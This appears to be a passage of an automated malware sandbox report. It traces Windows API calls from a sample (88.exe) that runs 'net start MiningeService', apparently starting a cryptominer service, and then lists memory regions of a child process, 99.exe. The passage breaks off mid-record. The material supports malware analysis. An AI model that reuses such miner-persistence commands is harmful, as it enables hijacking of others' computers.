[0279.676] RtlSizeHeap (HeapHandle=0x790000, Flags=0x0, MemoryPointer=0x7a34f0) returned 0x76 [0279.677] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0279.677] FindFirstFileExW (in: lpFileName="C:\\Windows\\net.*", fInfoLevelId=0x1, lpFindFileData=0x32ec44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ec44) returned 0xffffffff [0279.677] GetLastError () returned 0x2 [0279.678] FindFirstFileExW (in: lpFileName="C:\\Windows\\net", fInfoLevelId=0x1, lpFindFileData=0x32ec44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ec44) returned 0xffffffff [0279.678] GetLastError () returned 0x2 [0279.678] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0279.678] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x32ec44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ec44) returned 0x7a3570 [0279.679] GetProcessHeap () returned 0x790000 [0279.679] RtlAllocateHeap (HeapHandle=0x790000, Flags=0x0, Size=0x14) returned 0x7a35b0 [0279.679] FindClose (in: hFindFile=0x7a3570 | out: hFindFile=0x7a3570) returned 1 [0279.679] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x32ec44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ec44) returned 0xffffffff [0279.679] GetLastError () returned 0x2 [0279.679] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x32ec44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ec44) returned 0x7a3570 [0279.679] GetProcessHeap () returned 0x790000 [0279.679] RtlReAllocateHeap (Heap=0x790000, Flags=0x0, Ptr=0x7a35b0, Size=0x4) returned 0x7a35b0 [0279.680] FindClose (in: hFindFile=0x7a3570 | out: hFindFile=0x7a3570) returned 1 [0279.680] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0279.680] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0279.680] GetConsoleTitleW (in: lpConsoleTitle=0x32f13c, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe") returned 0x2b [0279.680] InitializeProcThreadAttributeList (in: lpAttributeList=0x32efc4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x32f08c | out: lpAttributeList=0x32efc4, lpSize=0x32f08c) returned 1 [0279.680] UpdateProcThreadAttribute (in: lpAttributeList=0x32efc4, dwFlags=0x0, Attribute=0x60001, lpValue=0x32f084, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x32efc4, lpPreviousValue=0x0) returned 1 [0279.680] GetStartupInfoW (in: lpStartupInfo=0x32ef80 | out: lpStartupInfo=0x32ef80*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x214, hStdOutput=0x20c, hStdError=0x20c)) [0279.680] GetProcessHeap () returned 0x790000 [0279.680] RtlAllocateHeap (HeapHandle=0x790000, Flags=0x8, Size=0x18) returned 0x7a3570 [0279.680] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0279.680] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0279.680] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0279.680] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0279.680] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0279.680] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0279.680] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0279.681] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0279.681] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0279.681] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0279.681] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0279.681] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0279.681] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0279.681] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0279.681] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0279.681] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0279.681] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0279.681] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0279.681] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0279.681] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0279.681] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0279.681] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0279.681] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0279.681] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0279.681] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0279.681] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0279.681] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0279.681] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0279.681] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0279.681] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0279.681] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0279.681] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0279.681] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0279.681] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0279.681] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0279.681] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0279.681] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0279.681] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0279.682] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0279.682] GetProcessHeap () returned 0x790000 [0279.682] HeapFree (in: hHeap=0x790000, dwFlags=0x0, lpMem=0x7a3570 | out: hHeap=0x790000) returned 1 [0279.682] GetProcessHeap () returned 0x790000 [0279.682] RtlAllocateHeap (HeapHandle=0x790000, Flags=0x8, Size=0xa) returned 0x7a0050 [0279.682] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0279.821] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net start MiningeService", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows", lpStartupInfo=0x32f020*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net start MiningeService", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x32f06c | out: lpCommandLine="net start MiningeService", lpProcessInformation=0x32f06c*(hProcess=0x84, hThread=0x80, dwProcessId=0xd48, dwThreadId=0xd54)) returned 1 [0279.828] CloseHandle (hObject=0x80) returned 1 [0279.828] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0279.829] GetProcessHeap () returned 0x790000 [0279.829] HeapFree (in: hHeap=0x790000, dwFlags=0x0, lpMem=0x7a4d80 | out: hHeap=0x790000) returned 1 [0279.829] GetEnvironmentStringsW () returned 0x7a4230* [0279.829] GetProcessHeap () returned 0x790000 [0279.829] RtlAllocateHeap (HeapHandle=0x790000, Flags=0x8, Size=0xb44) returned 0x7a4d80 [0279.829] FreeEnvironmentStringsW (penv=0x7a4230) returned 1 [0279.829] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0xffffffff) Process: id = "34" image_name = "99.exe" filename = "c:\\users\\keecfmwgj\\appdata\\local\\temp\\99.exe" page_root = "0x63659000" os_pid = "0xb7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "31" os_parent_pid = "0xa80" cmd_line = "\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6312 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6313 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6314 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6315 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 6316 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 6317 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 6318 start_va = 0x400000 end_va = 0x825fff monitored = 1 entry_point = 0x401000 region_type = mapped_file name = "99.exe" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\99.exe") Region: id = 6319 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6320 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6321 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 6322 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 6323 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 6324 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 6325 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6326 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6327 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6331 start_va = 0xa20000 end_va = 0xa9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 6332 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6333 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6334 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6335 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6336 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6337 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6338 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 6339 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6340 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 6341 start_va = 0xaa0000 end_va = 0xd8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 6342 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6343 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6344 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6345 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 6346 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 6347 start_va = 0x1a0000 end_va = 0x206fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6348 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 6349 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 6350 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 6351 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 6352 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6353 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 6354 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6355 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6356 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6357 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6358 start_va = 0x75cb0000 end_va = 0x768f9fff monitored = 0 entry_point = 0x75d31601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 6359 start_va = 0x771d0000 end_va = 0x77226fff monitored = 0 entry_point = 0x771e9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 6360 start_va = 0x6bed0000 end_va = 0x6bf01fff monitored = 0 entry_point = 0x6bed37f1 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll") Region: id = 6361 start_va = 0x75610000 end_va = 0x75644fff monitored = 0 entry_point = 0x7561145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 6362 start_va = 0x76c10000 end_va = 0x76c15fff monitored = 0 entry_point = 0x76c11782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 6363 start_va = 0x75a80000 end_va = 0x75bb5fff monitored = 0 entry_point = 0x75a81b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 6364 start_va = 0x76d80000 end_va = 0x76e74fff monitored = 0 entry_point = 0x76d81865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 6365 start_va = 0x75880000 end_va = 0x75a7afff monitored = 0 entry_point = 0x758822d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 6366 start_va = 0x76e80000 end_va = 0x76fdbfff monitored = 0 entry_point = 0x76ecba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 6367 start_va = 0x757f0000 end_va = 0x7587efff monitored = 0 entry_point = 0x757f3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 6368 start_va = 0x75650000 end_va = 0x75770fff monitored = 0 entry_point = 0x7565158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 6369 start_va = 0x76d70000 end_va = 0x76d7bfff monitored = 0 entry_point = 0x76d7238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 6370 start_va = 0x6c5c0000 end_va = 0x6c74ffff monitored = 0 entry_point = 0x6c65d026 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll") Region: id = 6371 start_va = 0x210000 end_va = 0x27ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 6372 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6373 start_va = 0x830000 end_va = 0x9b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 6374 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6375 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6376 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 6377 start_va = 0xaa0000 end_va = 0xc20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000aa0000" filename = "" Region: id = 6378 start_va = 0xc90000 end_va = 0xd8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c90000" filename = "" Region: id = 6379 start_va = 0xd90000 end_va = 0x218ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d90000" filename = "" Region: id = 6380 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 6381 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6382 start_va = 0x210000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 6383 start_va = 0x270000 end_va = 0x27ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 6384 start_va = 0x280000 end_va = 0x2dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 6385 start_va = 0x210000 end_va = 0x210fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 6386 start_va = 0x210000 end_va = 0x254fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 6387 start_va = 0x210000 end_va = 0x211fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 6388 start_va = 0x210000 end_va = 0x211fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 6389 start_va = 0x210000 end_va = 0x213fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 6390 start_va = 0x74520000 end_va = 0x74528fff monitored = 0 entry_point = 0x74521220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 6391 start_va = 0x6be10000 end_va = 0x6be16fff monitored = 0 entry_point = 0x6be11120 region_type = mapped_file name = "wsock32.dll" filename = "\\Windows\\SysWOW64\\wsock32.dll" (normalized: "c:\\windows\\syswow64\\wsock32.dll") Region: id = 6392 start_va = 0x2e0000 end_va = 0x3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 6393 start_va = 0x74430000 end_va = 0x744affff monitored = 0 entry_point = 0x744437c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 6394 start_va = 0x210000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 6421 start_va = 0x2190000 end_va = 0x226efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002190000" filename = "" Region: id = 6422 start_va = 0x2270000 end_va = 0x253efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6454 start_va = 0x210000 end_va = 0x210fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 6455 start_va = 0x230000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 6456 start_va = 0x220000 end_va = 0x220fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 6457 start_va = 0x3e0000 end_va = 0x3e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 6458 start_va = 0x3f0000 end_va = 0x3f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 6459 start_va = 0x9c0000 end_va = 0x9c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 6460 start_va = 0x9d0000 end_va = 0x9d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 6461 start_va = 0x9e0000 end_va = 0x9e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 6462 start_va = 0x9f0000 end_va = 0x9f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 6463 start_va = 0xa00000 end_va = 0xa00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 6464 start_va = 0xa10000 end_va = 0xa10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 6465 start_va = 0xc30000 end_va = 0xc30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 6466 start_va = 0xc40000 end_va = 0xc40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c40000" filename = "" Region: id = 6467 start_va = 0xc50000 end_va = 0xc50fff monitored = 1 entry_point = 0x0 region_type = private name = 